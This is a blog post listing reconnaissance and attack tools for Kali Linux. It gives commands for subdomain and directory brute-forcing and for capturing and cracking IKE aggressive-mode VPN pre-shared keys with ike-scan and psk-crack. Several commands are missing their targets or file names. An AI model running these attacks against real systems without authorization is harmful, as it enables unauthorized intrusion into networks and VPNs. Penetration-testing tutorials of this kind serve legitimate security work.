Saturday, October 20, 2018

List of recommended tools to install on Kali before pen-testing

Dnscan - A Python tool that uses a wordlist to resolve valid subdomains.

How to install Dnscan

1. Open the Terminal and type in 

git clone and press Enter

2. In the Terminal, navigate to the directory where you downloaded the Dnscan tool then type in ./ -h and press Enter

Now you will be able to see a screen like the one I have below.

Subbrute - This tool provides an extra layer of anonymity as it uses public resolvers to brute force the subdomains

How to install Subbrute

1. Open the Terminal and type in 

git clone and press Enter

Once the installation is complete you will need to have a dictionary wordlist to run it against a domain. You can either download a list at OR you can use Crunch which came with Kali to generate your own wordlist.

2. Once you have both Subbrute installed and a wordlist you can run the following command to brute-force a domain

./ -s /path/to/wordlist

Dirsearch - This tool can be used to brute-force a directory and it is much faster than DIRB. 

How to install Dirsearch

1. Open the Terminal and type in

git clone

2. Once the cloning is completed browse to the directory and run the tool using the following command

./ -u -e aspx, php

Below is an example of a screenshot after running Dirsearch

ike-scan - For attacking VPN

Sometimes when we attack a system or network we encounter VPN endpoints. However, finding vulnerabilities in those endpoints and exploiting them is not a well-known method. VPN endpoints use IKE or Internet Key Exchange protocol to set up a security association between multiple clients to establish a VPN tunnel.

IKE has two phases. The first phase is responsible for setting up and establishing a secure authentication communication channel, and phase two is responsible for encrypting and transporting the data.

Our focus of interest here is phase one which uses two methods of exchanging keys. The first method is the Main mode and the second is Aggressive mode.

We will hunt for aggressive mode enabled VPN endpoints using PSK authentication. 

To Install ike-scan

1. Open the Terminal and type in

git clone

2. Browse to the directory where ike-scan was downloaded and type in apt-get install autoconf

3. Now type in autoreconf --install and press Enter to generate a configure file.

4. Type in ./configure and press Enter

5. Now type in make and press Enter to build the project

6. Run make check to verify the building stage

7. Run make install to install ike-scan

8. To scan a host for an aggressive mode handshake, type in the command below. 

ike-scan -M -A and press Enter

After running the command above you will be able to see a screen like the one I have below.

9. Sometimes we will see the response after providing a valid group name like (vpn):

ike-scan -M -A id=vpn

For additional help on how to use ike-scan you can also execute the command ike-scan -h

NOTE: You can also brute-force the groupnames by using the script below


2. ./ groupnames.dic

Cracking the PSK

1. ike-scan -P

Where -P is the option to tell ike-scan to show a response with a captured hash.

2. To save the hash we provide a filename along with the -P flag like below.

psk-crack -b -5 /path/to/pskkey

Where -b is brute-force mode and length of the password is 5

3. To use a dictionary based attack we can use the following command

psk-crack -d /path/to/dictionary /path/to/pskkey

How does it work?

In aggressive mode, the authentication hash is transmitted as a response to the packet of the VPN client that tries to establish a connection Tunnel (IPSEC). This hash is not encrypted and hence it allows us to capture the hash and perform a brute force attack against it to recover our PSK. This is not possible in the main mode as it uses an encrypted hash along with a sixway handshake, whereas aggressive mode uses only the threeway handshake.


Post a Comment